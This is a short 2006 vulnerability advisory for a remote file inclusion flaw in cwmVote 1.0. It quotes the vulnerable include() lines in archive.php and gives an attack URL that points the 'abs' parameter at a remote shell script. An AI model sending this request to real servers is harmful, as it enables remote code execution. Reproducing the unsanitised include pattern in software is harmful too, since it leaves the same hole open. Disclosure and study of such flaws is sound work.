cwmVote 1.0 File Include Vulnerability

2006-12-20T00:00:00
ID SECURITYVULNS:DOC:15454
Type securityvulns
Reporter Securityvulns
Modified 2006-12-20T00:00:00

Description

cwmVote 1.0 File Include Vulnerability

F0und3R: bd0rk || SOH-Crew

Website: www.soh-crew.it.tt

Download: http://explorer.cwm-design.de/dirs/41/cwmVote.rar

Vulnerable Code in archive.php

Code: include($abs."inc/functions.inc.php"); include($abs."inc/conf.mysql.inc.php"); include($abs."inc/conf.pw.inc.php");

Usage: http://[target]/[cwm_vote_path]/archive.php?abs=http://[Shellscript]

Greetings: TheJT, Lu7k, Kacper, nukedx, str0ke